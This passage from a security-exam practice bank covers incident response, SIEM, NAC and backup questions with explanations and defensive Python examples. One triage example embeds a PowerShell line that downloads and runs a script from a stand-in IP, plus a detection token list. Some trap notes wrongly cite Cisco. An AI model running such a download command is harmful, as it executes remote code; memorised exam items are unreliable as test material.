The trap here is that candidates often choose to reboot the workstation (Option C) thinking it will 'clean' the system, but this destroys volatile evidence and does not contain the incident, whereas disabling the user account (Option B) is a valid containment step to prevent further access via that identity.

138
Multi-Select · medium

A legacy application server has a critical vulnerability, but the vendor will not release a fix for 30 days. Which two compensating controls are the best short-term risk reduction steps? Select two.

Select 2 answers
A.Restrict access to the server to known admin IPs or a jump host.
B.Place a web application firewall or IPS rule in front of the exposed service.
C.Document the issue and wait for the vendor patch without making any changes.
D.Open the service to more networks so monitoring tools can see it better.
E.Disable logging to reduce the performance overhead caused by the vulnerability.
Answers: A, B

Correct because limiting who can reach the server reduces exposure while the vulnerability remains unpatched. Fewer reachable sources means fewer opportunities for exploitation.

Why this answer

Option A is correct because restricting access to the server to known admin IPs or a jump host reduces the attack surface by limiting who can reach the vulnerable service. This network-layer control (e.g., using ACLs or firewall rules) prevents exploitation from untrusted sources while the vendor patch is pending. It is a classic compensating control that buys time without modifying the application itself.

Exam trap

The trap here is that candidates may think documenting the issue (Option C) is sufficient or that increasing monitoring (Option D) is a control, but CompTIA expects active risk reduction measures like access restriction and virtual patching, not passive or counterproductive actions.

139
MCQ · medium

An IDS raises an alert for a possible SQL injection attack against an internal reporting portal. The web server logs show the source IP belongs to the company's vulnerability scanner, and the requests match the scanner's normal test pattern. What is the most appropriate analyst action?

A.Treat the alert as a confirmed breach and begin password resets for all portal users.
B.Mark the alert as a likely false positive after verifying the scanner schedule and source IP.
C.Block the scanner IP permanently to prevent future alerts from the same host.
D.Quarantine the reporting server because IDS alerts always indicate active exploitation.
Answer: B

Authorized scanners often resemble attacks, so confirming the source and schedule is the right validation step.

Why this answer

Option B is correct because the IDS alert matches the known behavior of the company's vulnerability scanner, which is a legitimate and scheduled security tool. Verifying the scanner schedule and source IP confirms the traffic is authorized, making the alert a false positive. Analysts should correlate IDS alerts with asset inventories and change management records to avoid unnecessary incident response actions.

Exam trap

The trap here is that candidates may assume any SQL injection pattern in IDS logs is malicious, overlooking the possibility that the traffic originates from an authorized internal security tool.

How to eliminate wrong answers

Option A is wrong because treating the alert as a confirmed breach without verification wastes resources and causes unnecessary user disruption; IDS alerts require validation before escalation. Option C is wrong because permanently blocking the scanner IP would disrupt legitimate security testing and vulnerability management processes. Option D is wrong because quarantining the server based solely on an IDS alert ignores the context that the traffic is from an authorized scanner; IDS alerts can be false positives and do not always indicate active exploitation.

140
MCQ · easy

Based on the exhibit, which tool should the security team use to safely observe the attachment's behavior before delivery to users?

A.Sandboxing, so the file can execute in a controlled environment before release.
B.DLP, so the gateway can block sensitive data from leaving the organization.
C.NAC, so the sender's device can be checked before the message is accepted.
D.SIEM, so the team can store the attachment and review alerts later.
Answer: A

Sandboxing is designed to detonate suspicious files safely and observe their behavior. Because the attachment is a macro-enabled spreadsheet and static scanning did not find a known signature, dynamic analysis is the right next step. This helps confirm whether the file tries to drop malware, contact an external server, or modify the system.

Why this answer

Sandboxing allows the security team to execute the attachment in a controlled, isolated environment to observe its behavior (e.g., network connections, file modifications) without risking the production network. This is the correct approach because it safely detonates the file before delivery, enabling detection of malicious activity such as ransomware or trojans. Other tools like DLP, NAC, or SIEM do not provide the dynamic analysis needed to assess the attachment's runtime behavior.

Exam trap

The trap here is that candidates may confuse sandboxing with DLP or SIEM, thinking that blocking data exfiltration or reviewing logs after delivery is sufficient, when the question specifically requires observing behavior before delivery.

How to eliminate wrong answers

Option B (DLP) is wrong because Data Loss Prevention focuses on monitoring and blocking sensitive data exfiltration, not on analyzing the behavior of an attachment for malware. Option C (NAC) is wrong because Network Access Control checks the security posture of a device before granting network access, not the content or behavior of an attachment in an email. Option D (SIEM) is wrong because a Security Information and Event Management system aggregates and correlates logs for analysis, but it cannot safely execute or observe the runtime behavior of an attachment before delivery.

141
MCQmedium

A hardening script is pushed to a production web server and, within minutes, the application stops accepting secure connections. The team discovers the script disabled a required TLS setting that the legacy application still needs. What should have been in place to reduce the impact of this change?

A.A documented change window with testing in a staging environment and a rollback plan.
B.A longer password policy for administrators so they can log in after the outage.
C.Disabling all logging during the change so the application can restart faster.
D.Replacing the web server hardware to ensure the TLS settings are applied correctly.
AnswerA

This is the best control because it reduces operational risk before a production change is made. Testing and rollback planning are standard safeguards when security hardening may affect availability.

Why this answer

Option A is correct because a documented change window with testing in a staging environment and a rollback plan ensures that changes are validated before production deployment. In this scenario, the hardening script disabled a TLS setting (e.g., a protocol version or a specific cipher suite) that the legacy application still depended on. Testing in staging with the legacy client would have caught the incompatibility before production, the change window bounds the blast radius to an agreed period with staff watching, and a rollback plan (a saved copy of the previous configuration and a tested procedure to restore it) would have let the team revert within minutes instead of diagnosing under pressure.

Exam trap

The trap here is that candidates might think the issue is about authentication (Option B) or hardware (Option D), but the core problem is a configuration change that broke TLS compatibility, which requires proper change management and testing, not hardware or password policies.

How to eliminate wrong answers

Option B is wrong because a longer password policy for administrators does not address the technical issue of a misconfigured TLS setting; it only affects authentication, not the secure connection failure. Option C is wrong because disabling logging during the change does not help the application restart faster or prevent the TLS misconfiguration; logging is unrelated to the TLS stack or service recovery. Option D is wrong because replacing the web server hardware does not affect TLS settings; TLS configuration is software-based (e.g., in the web server's config files or registry), and hardware replacement would not resolve a misapplied script.
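An added example, not part of the original question set, showing the mechanics the correct answer relies on: snapshot the configuration, apply the hardening change, run a pre-flight check that represents the legacy application's needs, and roll back automatically when the check fails. The nginx-style configuration text, the legacy application's requirement (TLSv1.2 plus one named cipher) and the function names are constructed for this example; in production the check would be `nginx -t` plus a real handshake test against the staging server, whereas here it is a parser over the configuration text so the script runs offline.

```python
"""Apply a TLS hardening change with a snapshot, a pre-flight check and
automatic rollback. Added example; config text and requirements are constructed."""
import re
import shutil
import tempfile
from pathlib import Path

ORIGINAL_CONF = """\
server {
    listen 443 ssl;
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384;
}
"""
# A "hardening" that drops TLSv1.2 and the only cipher the legacy client speaks.
HARDENED_CONF = ORIGINAL_CONF.replace("TLSv1.2 TLSv1.3", "TLSv1.3").replace(
    "ECDHE-RSA-AES128-GCM-SHA256:", "")

# Assumed requirement documented for the legacy application (constructed).
LEGACY_NEEDS = {"protocol": "TLSv1.2", "cipher": "ECDHE-RSA-AES128-GCM-SHA256"}


def directive(conf: str, name: str) -> list:
    """Return the space/colon separated values of an nginx directive, or []."""
    m = re.search(rf"^\s*{name}\s+([^;]+);", conf, re.MULTILINE)
    return re.split(r"[\s:]+", m.group(1).strip()) if m else []


def legacy_still_served(conf: str) -> list:
    """Pre-flight check: list of problems; empty means the legacy app still works."""
    problems = []
    if LEGACY_NEEDS["protocol"] not in directive(conf, "ssl_protocols"):
        problems.append(f"{LEGACY_NEEDS['protocol']} removed from ssl_protocols")
    if LEGACY_NEEDS["cipher"] not in directive(conf, "ssl_ciphers"):
        problems.append(f"{LEGACY_NEEDS['cipher']} removed from ssl_ciphers")
    return problems


def apply_with_rollback(conf_path: Path, new_text: str, check) -> dict:
    """Snapshot the current config, write the new one, run the check,
    and restore the snapshot if the check reports any problem."""
    snapshot = conf_path.with_suffix(conf_path.suffix + ".bak")
    shutil.copy2(conf_path, snapshot)          # rollback point
    conf_path.write_text(new_text)
    problems = check(conf_path.read_text())
    if problems:
        shutil.copy2(snapshot, conf_path)      # rollback: previous config is back
        return {"applied": False, "rolled_back": True, "problems": problems}
    return {"applied": True, "rolled_back": False, "problems": []}


def demo(new_text: str = HARDENED_CONF) -> dict:
    """Run the change in a throwaway directory standing in for staging."""
    with tempfile.TemporaryDirectory() as d:
        conf = Path(d) / "site.conf"
        conf.write_text(ORIGINAL_CONF)
        result = apply_with_rollback(conf, new_text, legacy_still_served)
        result["final_conf_is_original"] = conf.read_text() == ORIGINAL_CONF
    return result


if __name__ == "__main__":
    print(demo())  # the over-aggressive hardening is rejected and rolled back
```

Running `demo()` with the constructed hardened configuration reports two problems and leaves the original file in place; a hardening that keeps TLSv1.2 and the required cipher while changing something else passes the check and is applied.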

142
MCQeasy

A SIEM alert shows a workstation connecting to the same unknown internet address every 15 minutes, even after business hours. The device belongs to an employee who is on vacation. What is the best next step for the analyst?

A.Dismiss the alert because periodic connections are always normal for workstations.
B.Treat the alert as potentially malicious and check endpoint and proxy logs for more context.
C.Immediately delete the workstation account from the directory service.
D.Shut down the entire office network until the analyst can review the alert.
AnswerB

Unknown periodic outbound traffic can indicate beaconing, so additional log review is the right next step.

Why this answer

Option B is correct because the alert describes a persistent outbound connection to an unknown external IP address at regular intervals, which is a classic indicator of beaconing behavior often associated with malware command-and-control (C2) traffic. The fact that the connection occurs after business hours and the workstation's user is on vacation increases suspicion, as legitimate scheduled tasks or updates would typically not run under those conditions. Checking endpoint and proxy logs provides the necessary context to determine if the traffic is benign (e.g., a misconfigured service) or malicious (e.g., C2 communication).

Exam trap

The trap here is that candidates may assume periodic connections are always benign (e.g., Windows Update or NTP sync) and dismiss the alert, failing to recognize that the regularity, unknown destination, and user-on-vacation context are red flags for malicious C2 activity.

How to eliminate wrong answers

Option A is wrong because periodic connections are not always normal; beaconing at fixed intervals to an unknown external address is a well-known indicator of compromise (IoC) in security monitoring, and dismissing it outright violates standard incident response procedures. Option C is wrong because immediately deleting the workstation account from the directory service is a drastic, irreversible action that could disrupt legitimate operations and destroy forensic evidence; the proper first step is to gather additional context before taking containment actions. Option D is wrong because shutting down the entire office network is a disproportionate response to one unverified alert: it interrupts business for every user and removes the live network context the analyst needs, when a single suspect workstation can be isolated on its own once the logs confirm the activity.
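An added example, not from the original question set, showing how an analyst turns "the same address every 15 minutes" into a measurable beaconing indicator over proxy logs: group connections by source and destination, compute the gaps between consecutive connections, and flag pairs whose gaps are nearly constant. The log format, the sample lines and the thresholds (`min_events`, `max_cv`) are constructed assumptions to tune against your own baseline; a flagged pair is a lead for the endpoint and proxy review the question describes, not a verdict.

```python
"""Flag periodic outbound connections (beaconing) in constructed proxy log lines.
Added example. Line format (constructed): "<ISO timestamp> <src_ip> <dst> <bytes>"."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: one workstation checks in every 15 minutes with a few
# seconds of jitter; another host browses a site at irregular times.
SAMPLE_LOG = """\
2024-05-11T01:00:02 10.0.5.23 203.0.113.77 412
2024-05-11T01:15:01 10.0.5.23 203.0.113.77 418
2024-05-11T01:30:03 10.0.5.23 203.0.113.77 410
2024-05-11T01:45:02 10.0.5.23 203.0.113.77 415
2024-05-11T02:00:01 10.0.5.23 203.0.113.77 411
2024-05-11T02:15:04 10.0.5.23 203.0.113.77 417
2024-05-11T01:03:17 10.0.5.40 www.example.com 9120
2024-05-11T01:09:45 10.0.5.40 www.example.com 3311
2024-05-11T01:41:02 10.0.5.40 www.example.com 17044
2024-05-11T02:12:30 10.0.5.40 www.example.com 802
2024-05-11T02:13:10 10.0.5.40 www.example.com 55600
"""


def parse(log_text: str) -> dict:
    """Group connection timestamps by (src, dst) pair."""
    pairs = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, _bytes = line.split()
        pairs[(src, dst)].append(datetime.fromisoformat(ts))
    return pairs


def beacon_candidates(log_text: str, min_events: int = 5, max_cv: float = 0.10) -> dict:
    """Return (src, dst) pairs whose inter-arrival times are nearly constant.

    cv = population stdev / mean of the gaps between consecutive connections.
    Human browsing has a high cv; a scheduled check-in has a very low one.
    Thresholds are illustrative assumptions, not vendor defaults.
    """
    hits = {}
    for pair, stamps in parse(log_text).items():
        stamps.sort()
        if len(stamps) < min_events:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        if cv <= max_cv:
            hits[pair] = {"events": len(stamps), "interval_s": round(avg), "cv": round(cv, 3)}
    return hits


if __name__ == "__main__":
    for pair, stats in beacon_candidates(SAMPLE_LOG).items():
        print(pair, stats)
```

On the constructed sample only the 10.0.5.23 to 203.0.113.77 pair is flagged, with a 900 second interval; the browsing host's gaps vary too much. Real beacons often add deliberate jitter, so a production version would also look at the consistency of bytes transferred and at the destination's reputation before raising the priority.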

143
MCQmedium

Facilities sees occasional water droplets forming above the cable trays in a data room during humid afternoons. The team wants the earliest possible warning before equipment is damaged. Which control should be added?

A.Motion detectors connected to the alarm panel.
B.Water leak sensors tied to environmental monitoring.
C.Badge readers on the room entrance only.
D.Fire suppression tests scheduled more frequently.
AnswerB

Leak or moisture sensors provide early detection of water intrusion so staff can respond before equipment is harmed.

Why this answer

Water leak sensors tied to environmental monitoring provide the earliest possible warning by detecting moisture directly on or near the cable trays. Unlike motion detectors or badge readers, these sensors are specifically designed to alert before water reaches sensitive equipment, enabling proactive remediation.

Exam trap

The trap here is that candidates may confuse physical security controls (motion detectors, badge readers) with environmental monitoring controls, overlooking that water damage requires specific moisture detection rather than access or motion sensing.

How to eliminate wrong answers

Option A is wrong because motion detectors detect movement, not water, and would not provide any warning about condensation or leaks. Option C is wrong because badge readers control physical access to the room but cannot detect environmental conditions like humidity or water. Option D is wrong because fire suppression tests are unrelated to water detection and do not address the condensation issue; they focus on fire safety, not moisture monitoring.

144
Multi-Selecthard

A SIEM correlates the following: 17 failed logons against the same VPN account from one IP in 9 minutes, a successful login from that IP, creation of a new API token in the SaaS tenant, and a large export job started two minutes later. Which two interpretations are best supported? Select two.

Select 2 answers
A.The attacker is likely performing a brute-force password attack against a single account.
B.The pattern is most consistent with password spraying across many accounts.
C.The account is likely compromised and being used for token abuse or persistence.
D.The events primarily indicate a volumetric denial-of-service attack.
E.Token creation proves the account password was never exposed.
AnswersA, C

Repeated failures focused on one account from one source fit brute-force guessing against a specific target.

Why this answer

A is correct because 17 failed logons against a single VPN account from one IP in 9 minutes is a classic brute-force pattern: repeated authentication attempts against one username from one source. C is correct because the successful login followed within minutes by creation of a new API token and a large export is post-compromise activity; the token gives the attacker access that survives a password reset (persistence), and the export is the data theft that token enables. Password spraying (B) would look different: a few attempts each against many accounts. Nothing here indicates a volumetric denial of service (D), and a new token says nothing about whether the password was exposed (E); the attacker needed the password to log in before the token could be created.

Exam trap

The trap here is confusing a single-account brute-force with password spraying—candidates often misidentify the pattern because they see multiple failed logons and assume many accounts are targeted, but the key is the same account and same IP over a short window.
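An added example, not from the original question set, implementing the correlation the question describes as a detection: count failures per account and source inside a sliding window to separate brute force from spraying, then look for a success from the same source followed by token creation or an export. The event records, field names and thresholds are constructed assumptions; map them to your SIEM's schema and tune the numbers against your own logon volumes.

```python
"""Correlate failed logons -> success -> API token -> export into findings.
Added example; events and thresholds are constructed, not a vendor rule."""
from datetime import datetime, timedelta

T0 = datetime(2024, 5, 11, 22, 0, 0)

# Constructed events mirroring the question: 17 failures from one source
# against one account in under 9 minutes, then success, token, export.
EVENTS = [
    {"t": T0 + timedelta(seconds=30 * i), "type": "vpn_auth_fail",
     "user": "j.doe", "src": "198.51.100.9"} for i in range(17)
] + [
    {"t": T0 + timedelta(minutes=9), "type": "vpn_auth_success", "user": "j.doe", "src": "198.51.100.9"},
    {"t": T0 + timedelta(minutes=10), "type": "saas_token_create", "user": "j.doe", "src": "198.51.100.9"},
    {"t": T0 + timedelta(minutes=12), "type": "saas_export_start", "user": "j.doe", "src": "198.51.100.9"},
    # Benign noise: one typo, then a normal login with no follow-on activity.
    {"t": T0 + timedelta(minutes=3), "type": "vpn_auth_fail", "user": "a.lee", "src": "192.0.2.40"},
    {"t": T0 + timedelta(minutes=4), "type": "vpn_auth_success", "user": "a.lee", "src": "192.0.2.40"},
]

FAIL_THRESHOLD = 10                # failures per (user, src) inside WINDOW
WINDOW = timedelta(minutes=10)
FOLLOWUP = timedelta(minutes=30)   # how long after a success we watch for token/export


def classify(events: list) -> dict:
    """Return findings keyed by (user, src).

    'brute_force': one account sees >= FAIL_THRESHOLD failures from one source
    inside WINDOW. 'post_auth_abuse': a success from that source is followed by
    token creation and/or an export inside FOLLOWUP.
    """
    events = sorted(events, key=lambda e: e["t"])
    by_pair = {}
    for e in events:
        by_pair.setdefault((e["user"], e["src"]), []).append(e)

    findings = {}
    for pair, evs in by_pair.items():
        tags = set()
        fails = [e["t"] for e in evs if e["type"] == "vpn_auth_fail"]
        for i, start in enumerate(fails):          # sliding window over failures
            if sum(1 for t in fails[i:] if t - start <= WINDOW) >= FAIL_THRESHOLD:
                tags.add("brute_force")
                break
        for s in (e["t"] for e in evs if e["type"] == "vpn_auth_success"):
            after = {e["type"] for e in evs if s <= e["t"] <= s + FOLLOWUP}
            if after & {"saas_token_create", "saas_export_start"}:
                tags.add("post_auth_abuse")
        if tags:
            findings[pair] = sorted(tags)
    return findings


def spray_sources(events: list, min_users: int = 5) -> set:
    """Password spraying is the other shape: one source, many distinct users."""
    users_per_src = {}
    for e in events:
        if e["type"] == "vpn_auth_fail":
            users_per_src.setdefault(e["src"], set()).add(e["user"])
    return {src for src, users in users_per_src.items() if len(users) >= min_users}


if __name__ == "__main__":
    print(classify(EVENTS))
    print("spray sources:", spray_sources(EVENTS))
```

On the constructed events the j.doe account from 198.51.100.9 is tagged both `brute_force` and `post_auth_abuse`, the a.lee noise produces nothing, and `spray_sources` is empty because neither source touched many accounts; that last check is what keeps the brute-force and spraying interpretations apart.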

145
Multi-Selectmedium

A ransomware incident encrypted a file share and the attached NAS backups because the NAS stayed mounted to production and was reachable over SMB. Which two design changes would have reduced the blast radius most effectively? Select two.

Select 2 answers
A.Keep at least one backup copy offline or immutable.
B.Use a separate backup account and a restricted backup network segment.
C.Mount the backup share permanently so restores are always faster.
D.Join the NAS to the same administrative group used by production servers.
E.Disable restore testing to avoid risking the backup environment.
AnswersA, B

Correct because an offline or immutable backup cannot be encrypted or deleted as easily by ransomware. It preserves a clean recovery point even if the production environment is fully compromised.

Why this answer

Option A is correct because keeping at least one backup copy offline or immutable ensures that even if the primary storage and network-attached backups are compromised, the offline or immutable copy remains intact and recoverable. In this scenario, the NAS was mounted and reachable over SMB, allowing ransomware to encrypt both the production share and the backup target. An immutable backup (e.g., using WORM storage or object lock) cannot be modified or deleted by the ransomware for the duration of the lock, preserving a clean recovery point. Option B is correct because a dedicated backup account holding only the rights the backup job needs, never used for interactive logons, combined with a restricted backup network segment, means that a stolen production administrator credential or an SMB-reachable share no longer gives the ransomware a path to the backup target.

Exam trap

Cisco often tests the misconception that mounting backups permanently improves recovery speed without considering the security trade-off, leading candidates to choose Option C instead of recognizing that offline or immutable backups are the primary defense against ransomware propagation.

146
Multi-Selectmedium

An EDR alert shows winword.exe launching powershell.exe with an encoded command after a user opened an invoice attachment. No new executable file was written to disk, and the host is still online. Which two actions should the SOC analyst take first to validate the alert and collect usable evidence? Select two.

Select 2 answers
A.Review the parent-child process chain and the full PowerShell command line in EDR.
B.Compare the endpoint's outbound connections with its normal baseline and approved destinations.
C.Reimage the workstation immediately to eliminate any possible persistence.
D.Ask the user to delete the suspicious email and clear the recycle bin.
E.Check PowerShell script block logs, AMSI detections, and related event records on the endpoint.
AnswersA, E

This shows whether the alert is truly a suspicious macro-to-PowerShell execution chain and reveals the exact command arguments used.

Why this answer

Option A is correct because reviewing the parent-child process chain (winword.exe → powershell.exe) and the full PowerShell command line in the EDR allows the analyst to immediately validate whether the alert is a true positive by confirming the process lineage and decoding the encoded command. This step is critical for understanding the attacker's intent without relying on disk artifacts, as the attack is fileless and memory-resident. Option E is correct because PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) records script content as it executes, so the decoded payload and any stages it loads in memory are captured even though nothing was written to disk, and AMSI detections show what the antimalware engine saw at scan time. Together with the EDR lineage this is evidence that survives a reboot, which matters because the host is still online and the memory-resident artifacts will not.

Exam trap

The trap here is that candidates may think reimaging or deleting the email is a valid containment step, but the question specifically asks for actions to validate the alert and collect usable evidence, not to contain or remediate.
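An added example, not from the original question set, of the first validation step the correct answers describe: take the EDR's process lineage and command line, decode the `-EncodedCommand` argument (base64 of UTF-16LE text), and record why the chain is suspicious. The telemetry record and its field names are constructed and are not any vendor's schema; the encoded payload is a harmless constructed string that the script builds itself so the example stays self-contained.

```python
"""Triage an Office-to-PowerShell alert: check lineage and decode -EncodedCommand.
Added example; the ALERT record is constructed, not real EDR output."""
import base64
from typing import Optional


def encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stand-in for the download-cradle an invoice macro might launch.
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"

ALERT = {  # constructed telemetry record
    "grandparent": "explorer.exe",
    "parent": "WINWORD.EXE",
    "process": "powershell.exe",
    "cmdline": "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc "
               + encode_ps(CONSTRUCTED_SCRIPT),
}

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring",
                     "frombase64string", "-w hidden", "bypass")


def is_encoded_flag(arg: str) -> bool:
    """PowerShell accepts -ec and any unambiguous prefix of -EncodedCommand."""
    a = arg.lower()
    return a == "-ec" or (len(a) >= 2 and "-encodedcommand".startswith(a))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    args = cmdline.split()
    for i, a in enumerate(args[:-1]):
        if is_encoded_flag(a):
            return base64.b64decode(args[i + 1], validate=True).decode("utf-16-le")
    return None


def triage(alert: dict) -> dict:
    """Collect the evidence an analyst wants before calling true/false positive."""
    decoded = decode_encoded_command(alert["cmdline"]) or ""
    haystack = (alert["cmdline"] + " " + decoded).lower()
    reasons = []
    if alert["parent"].lower() in OFFICE_PARENTS:
        reasons.append(f"Office parent {alert['parent']} spawned {alert['process']}")
    hits = [t for t in SUSPICIOUS_TOKENS if t in haystack]
    if hits:
        reasons.append("suspicious tokens: " + ", ".join(hits))
    return {
        "chain": " -> ".join([alert["grandparent"], alert["parent"], alert["process"]]),
        "decoded_command": decoded,
        "reasons": reasons,
        "verdict": "likely_true_positive" if len(reasons) >= 2 else "needs_more_context",
    }


if __name__ == "__main__":
    for k, v in triage(ALERT).items():
        print(f"{k}: {v}")
```

The decoded string is what the analyst pivots on next: the URL it contacts goes to the proxy and outbound-connection review, and the same text should appear in the endpoint's script block log if logging is enabled. A missing 4104 record for a command the EDR clearly saw is itself a finding about logging coverage.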

147
MCQmedium

At 10:15, a file server begins renaming documents and creating payment notes. The SOC confirms the server is also making SMB connections to other internal hosts, but users can still access shared folders. What should the incident handler do FIRST?

A.Disconnect the server from the network or isolate it through EDR containment while preserving power
B.Shut down the server immediately to stop all malicious activity
C.Restore the server from backup before taking any other action
D.Wait for users to report more symptoms before responding
AnswerA

Immediate containment stops lateral movement and further encryption while preserving the system for investigation and evidence collection.

Why this answer

The correct first step is to contain the incident by disconnecting the server from the network or using EDR containment while preserving power. This stops the spread of malicious SMB connections and prevents further damage, while keeping the system powered on to preserve volatile evidence (e.g., memory, running processes) for forensic analysis. Immediate containment aligns with the NIST incident response framework's containment phase, prioritizing isolation over eradication or recovery.

Exam trap

The trap here is that candidates may choose to shut down the server (Option B) thinking it stops the attack, but the exam emphasizes preserving power and volatile evidence for forensic analysis, making network isolation the correct first step.

How to eliminate wrong answers

Option B is wrong because shutting down the server destroys volatile evidence (e.g., memory contents, active network connections) and may allow malware to persist or trigger destructive payloads on reboot. Option C is wrong because restoring from backup before containment could re-infect the network if the backup is compromised, and it skips the critical step of preserving evidence. Option D is wrong because waiting for more symptoms allows the attacker to move laterally via SMB, encrypt more files, or exfiltrate data, violating the principle of rapid containment.

148
Multi-Selectmedium

An organization is implementing a Security Information and Event Management (SIEM) system to enhance its security monitoring capabilities. Which four of the following are primary functions of a SIEM? (Choose four.)

Select 4 answers
A.Correlation of log data from multiple sources
B.Real-time alerting on security events
C.Centralized log storage and retention
D.Automated threat intelligence feed integration
E.Vulnerability scanning and patch management
F.In-line network traffic blocking
AnswersA, B, C, D

Why this answer

A SIEM's primary functions include correlation of log data from multiple sources to identify patterns and anomalies, real-time alerting on security events to enable immediate response, centralized log storage and retention for compliance and forensic analysis, and automated threat intelligence feed integration to enrich event data with known indicators of compromise (IOCs). These capabilities collectively provide comprehensive security monitoring and incident detection.

Exam trap

Cisco often tests the misconception that a SIEM can actively block traffic or perform vulnerability scanning. A SIEM sits out of band, collecting and analyzing logs; it is not inline, so it cannot block traffic itself, and it does not scan hosts for vulnerabilities or deploy patches. Where automated response exists, it is delegated through integrations to a SOAR platform or to enforcement points such as firewalls and EDR; the SIEM triggers the action rather than performing it.

149
MCQmedium

A contractor connects a personal tablet to a lobby Ethernet jack. The network team wants the device blocked from internal resources until it passes posture checks and only guest access is allowed meanwhile. Which control best fits?

A.A data loss prevention platform that inspects file transfers.
B.Network access control that verifies the device before granting access.
C.A network intrusion detection system placed inline at the switch.
D.A VPN concentrator that encrypts remote traffic back to headquarters.
AnswerB

NAC is designed to admit, deny, or segment devices based on identity, posture, and policy before they reach internal resources.

Why this answer

Network Access Control (NAC) is the correct solution because it enforces security policies by checking a device's compliance (e.g., antivirus, patch level) before granting access to internal resources. In this scenario, the contractor's tablet is initially placed on a guest VLAN with internet-only access until posture checks pass, which is a core NAC function (e.g., using 802.1X or MAC authentication bypass).

Exam trap

The trap here is confusing NAC with a NIDS or DLP, because candidates often think 'blocking' requires an inline security appliance, but NAC uses switch-level VLAN assignment and 802.1X to enforce policy without inspecting content.

How to eliminate wrong answers

Option A is wrong because a Data Loss Prevention (DLP) platform inspects data in motion or at rest to prevent leaks, not to enforce pre-admission posture checks or VLAN assignment. Option C is wrong because a Network Intrusion Detection System (NIDS) monitors traffic for malicious patterns but does not block or quarantine devices based on compliance status; it is passive and cannot enforce guest-only access. Option D is wrong because a VPN concentrator encrypts remote traffic but does not perform device posture assessment or control local network segmentation before access is granted.

150
MCQmedium

After a ransomware event, management wants proof that last night's backups can actually support business operations before they declare recovery complete. What is the best action?

A.Perform a test restore into an isolated environment and validate the files or application work correctly.
B.Increase the backup retention period without testing the backups.
C.Copy the backup set to a new storage bucket and assume it is usable.
D.Run a vulnerability scan against the backup server.
AnswerA

A test restore is the only option that proves the backup can actually be recovered and used. By restoring into an isolated environment, the team avoids contaminating production while still confirming that data, permissions, and the application behave as expected. This also helps validate recovery objectives and exposes problems such as corrupted backups, missing dependencies, or failed restore procedures before a real outage occurs.

Why this answer

Option A is correct because performing a test restore into an isolated environment directly validates that the backup data is intact, the restore process works, and the restored files or applications function as expected. This provides management with the proof they need to confirm business operations can resume, which is the core requirement after a ransomware event.

Exam trap

The trap here is that candidates may confuse backup management tasks (like retention or copying) with actual recovery validation, or think that security scanning proves backup usability, when only a functional test restore provides the required proof of operability.

How to eliminate wrong answers

Option B is wrong because merely increasing the backup retention period does not verify the usability or integrity of the backups; it only stores more data without any validation. Option C is wrong because copying the backup set to a new storage bucket and assuming it is usable ignores the need to test the restore process and verify data integrity; backups are useless if they cannot be restored correctly. Option D is wrong because running a vulnerability scan against the backup server checks for security weaknesses but does not test whether the backup data can be restored and support business operations.
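An added example, not from the original question set, of what a test restore that satisfies management actually does: restore the archive into a fresh isolated directory, verify every file against the manifest the backup job produced, and compare the restore time with the recovery time objective. The backup archive, its manifest, the sample files and the RTO value are constructed here so the script runs offline; in practice the archive comes from the backup system and the manifest from the same job. The damaged-backup path simulates the case the question warns about, a job that "completed successfully" but is not usable.

```python
"""Prove a backup is usable: isolated restore, integrity check against the
manifest, restore time against the RTO. Added example with constructed data."""
import hashlib
import io
import json
import tarfile
import tempfile
import time
from pathlib import Path
from typing import Optional

RTO_SECONDS = 4 * 3600  # assumed recovery time objective for this file share

SAMPLE_FILES = {  # constructed stand-in for the file share contents
    "ledger.csv": b"id,amount\n1,40\n2,75\n",
    "notes.txt": b"quarterly review\n",
}


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def make_constructed_backup(dest: Path, files: dict, corrupt: Optional[str] = None) -> Path:
    """Write a tar backup plus a JSON manifest of sha256 digests (constructed).
    If `corrupt` names a file, the archived copy is altered after the manifest
    was computed, simulating a damaged backup that the job still reported as OK."""
    manifest = {name: hashlib.sha256(data).hexdigest() for name, data in files.items()}
    archive = dest / "share-backup.tar"
    with tarfile.open(archive, "w") as tar:
        for name, data in files.items():
            payload = data + b"\x00" if name == corrupt else data
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    (dest / "manifest.json").write_text(json.dumps(manifest))
    return archive


def safe_extract(tar: tarfile.TarFile, dest: str) -> None:
    """Extract without letting member paths escape the isolated directory."""
    try:
        tar.extractall(dest, filter="data")   # Python 3.12+ and backports
    except TypeError:                          # older interpreter: manual check
        for m in tar.getmembers():
            if m.name.startswith(("/", "..")) or "/../" in m.name:
                raise ValueError(f"unsafe member path: {m.name}")
        tar.extractall(dest)


def verify_restore(archive: Path, manifest_path: Path, rto_seconds: float = RTO_SECONDS) -> dict:
    """Restore into a fresh isolated directory and validate integrity and timing."""
    manifest = json.loads(manifest_path.read_text())
    with tempfile.TemporaryDirectory(prefix="restore-test-") as isolated:
        start = time.monotonic()
        with tarfile.open(archive) as tar:
            safe_extract(tar, isolated)
        elapsed = time.monotonic() - start
        root = Path(isolated)
        missing = [n for n in manifest if not (root / n).is_file()]
        mismatched = [n for n in manifest
                      if n not in missing and sha256_file(root / n) != manifest[n]]
    return {
        "restore_seconds": elapsed,
        "within_rto": elapsed <= rto_seconds,
        "missing": missing,
        "mismatched": mismatched,
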